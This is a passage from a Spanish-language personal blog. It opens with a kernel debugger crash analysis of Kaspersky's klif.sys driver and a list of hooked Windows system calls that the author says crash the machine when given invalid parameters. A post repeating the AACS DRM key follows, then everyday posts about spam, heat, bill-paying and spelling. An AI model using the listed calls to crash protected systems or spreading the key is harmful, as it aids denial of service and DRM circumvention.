ANALYSIS: Force reload command: .reload /f ntoskrnl.exe=FFFFFFFF804D7000,214600,41108004
***** Kernel symbols are WRONG. Please fix symbols to do analysis.

***** Kernel symbols are WRONG. Please fix symbols to do analysis.


MODULE_NAME: klif

FAULTING_MODULE: 804d7000 nt

DEBUG_FLR_IMAGE_TIMESTAMP: 46260f1c

READ_ADDRESS: unable to get nt!MmSpecialPoolStart
unable to get nt!MmSpecialPoolEnd
unable to get nt!MmPoolCodeStart
unable to get nt!MmPoolCodeEnd
83000000

FAULTING_IP:
klif+1940c
f941840c 0fbe08 movsx ecx,byte ptr [eax]

MM_INTERNAL_CODE: 0

CUSTOMER_CRASH_COUNT: 1

DEFAULT_BUCKET_ID: WRONG_SYMBOLS

BUGCHECK_STR: 0x50

LAST_CONTROL_TRANSFER: from f941b39a to f941840c

STACK_TEXT:
WARNING: Stack unwind information not available. Following frames may be wrong.
f64c8d24 f941b39a 83000000 00000008 00000000 klif+0x1940c
f64c8d64 7c90eb94 badb0d00 0012f3e4 00000000 klif+0x1c39a
f64c8d68 badb0d00 0012f3e4 00000000 00000000 0x7c90eb94
f64c8d6c 0012f3e4 00000000 00000000 00000000 0xbadb0d00
f64c8d70 00000000 00000000 00000000 00000000 0x12f3e4


STACK_COMMAND: kb

FOLLOWUP_IP:
klif+1940c
f941840c 0fbe08 movsx ecx,byte ptr [eax]

SYMBOL_STACK_INDEX: 0

FOLLOWUP_NAME: MachineOwner

IMAGE_NAME: klif.sys

SYMBOL_NAME: klif+1940c

BUCKET_ID: WRONG_SYMBOLS

Followup: MachineOwner

Algunos descubrimientos hechos por UG North muestran que hay otras funciones que tambien estan intervenidas por klif.sis las cuales pueden ser explotadas con ataques similares.

Lista de entradas en la SSDT explotables
(Windows XP / KAV 7.0.0.55)

==================================
|[Idx] [nombre de la función] |
==================================
|[41 ] NtCreateKey
|[47 ] NtCreateProcess
|[48 ] NtCreateProcessEx
|[50 ] NtCreateSection
|[52 ] NtCreateSymbolicLinkObject
|[53 ] NtCreateThread
|[65 ] NtDeleteValueKey
|[99 ] NtLoadKey2
|[119] NtOpenKey
|[122] NtOpenProcess
|[125] NtOpenSection
|[177] NtQueryValueKey
==================================
Cualquier llamada a esas funciones con parametros invalidos, llevara a un BSOD.

Este tipo de exploit fue descubierto por Ms-Rem en el 2005 y funciona para KAV 5.0

Como se mostro este exploit funciona para todas la versiones de Kaspersky Antivirus incluyendo la nueva versión 7.0.

¿Realmente aun crees quie estas portegido?

08

Jun

El numero del mal jajajaja

09-f9-11-02-9d-74-e3-5b-d8-41-56-c5-63-56-88-c0

09 f9 11 02 9d 74 e3 5b d8 41 56 c5 63 56 88 c0

09F911029D74E35BD84156C5635688C0

09f911029d74e35bd84156c5635688c0

09-f9-11-02-9d-74-e3-5b-d8-41-56-c5-63-56-88-c0

09 f9 11 02 9d 74 e3 5b d8 41 56 c5 63 56 88 c0

09F911029D74E35BD84156C5635688C0

09f911029d74e35bd84156c5635688c0

09-f9-11-02-9d-74-e3-5b-d8-41-56-c5-63-56-88-c0

09 f9 11 02 9d 74 e3 5b d8 41 56 c5 63 56 88 c0

09F911029D74E35BD84156C5635688C0

09f911029d74e35bd84156c5635688c0

09-f9-11-02-9d-74-e3-5b-d8-41-56-c5-63-56-88-c0

09 f9 11 02 9d 74 e3 5b d8 41 56 c5 63 56 88 c0

09F911029D74E35BD84156C5635688C0

09f911029d74e35bd84156c5635688c0


07

Jun

Y con todo y eso ami me esta llegando más spam

no cabe duda que la vida esta llena de contradicciones... hace unos cuantos dias acaban de apresar al spammer numero uno del mundo el sr soloway, peor ami me eta llegando más spam, porque no se pero parece que hotmail me esta fallando....

07

Jun

Se estan asando los pinguinos

Hace un tiempo comente que esteban nevando pingüinos en esta ciudad de Durango, pero siendo esta usa ciudad algo cambiante hoy veo como estos pingüinos se están asando... y es que no basta con decir que la ultima semana no la hemos pasado a 37 grados centígrados, sino que parece ser que va en aumento.
Así que no esta de más tomar algunas precauciones porque el inclemente calor no nos quiere dejar en paz.. y pues faltaba más alguien saque las heladas o que pts ???
jajaj

Saludos

05

Jun

¿Miedo al cambio?

Hoy por la mañana fui a pagar la luz, lo cual no es interesante por si, más cuando entre a las instalaciones de la CFE, note que había varias personas formadas en la fila de la única cajera que existe en el lugar. Si alguien hubiera notado mi cara en ese momento, me hubiera preguntado que si me sentía bien o que me pasaba, y es que no lo puedo creer, habiendo 4 cajeros automáticos en la parte de adentro del recinto y otros 4 en la parte externa que funcionan las 24 horas, estaban casi abandonados y no digamos por falta de mantenimiento, sino por falta de uso de los usuarios…

Y si esto fuera poco cuando venía de camino hacia el trabajo pase al lado de una oficina de cobros de Telemedia, y no pude evitar fijarme en la fuga de agua que tenían en la parte exterior, la cual afectaba a la tubería que sobresale en la parte donde va el medidor. Si bien un a fuga no es cosa del otro mundo y se puede reparar cambiando el tubo, los señores de esta empresa de televisión por cable decidieron usar una técnica mas “Mexicana” y amarraron varias tiras de cámara de llanta lo cual tal vez tapo la fuga por un rato pero que a final de cuentas termino dejándola como al principio es decir con fuga.

Y con esto me pregunto qué nos pasa en México, está bien que tenemos un rezago educativo, y eso no lo podemos negar, pero peor aún es nuestra mentalidad de oponernos a los cambios tecnológicos, veamos por ejemplo que en estados unidos muchas de las ventas que suceden a diario se llevan a cabo por medio de internet y en México esas sumas no llegan a un nivel siquiera perceptible económicamente hablando, es decir si tu vives de vender artículos por internet en estos momento en México te mueres de hambre.

Por lo tanto no queda más que cooperar con nuestro granito de arena y comenzar a aceptar esos cambios que avecinan y que sobre todo no podemos parar. Tal vez yo soy solo uno y tu también pero recuerda de uno en uno llegas a juntar millones…

Un saludo

04

Jun

los errores al escribir

Como muchos se podrán dar cuenta mi ortografía no es uno de los aspectos más sobresalientes que poseo, y sin embargo me he dado cuenta de que no soy el único que escribe con las patas (coloquialmente hablando), pues he visto algunas cuantas visitas al blog,desde Google siendo la que mas visitas tiene la de "messnger",lo cual demuestra que la gente suele escribir mal en este artefacto llamado computadora.

Pero donde reside el problema, ¿en la mala calidad de educación que recibimos?, ¿en nuestra flojera en escribir correctamente?
Pues en mi caso, creo que es eso y más, ya que muchas veces se que se acentúa una palabra, que esta mal escrita y aun así la dejo en la forma en que la escribí.
Tengo que aceptar que no soy la persona que mejor maneja el español o que usa las palabras más apropiadas.

En fin que hacer con esta nueva generación que escribe así:
-Ke ond we
- no nad
-ns vmos luego
-(p) (es el icono de una camarita)
-xao

Saludos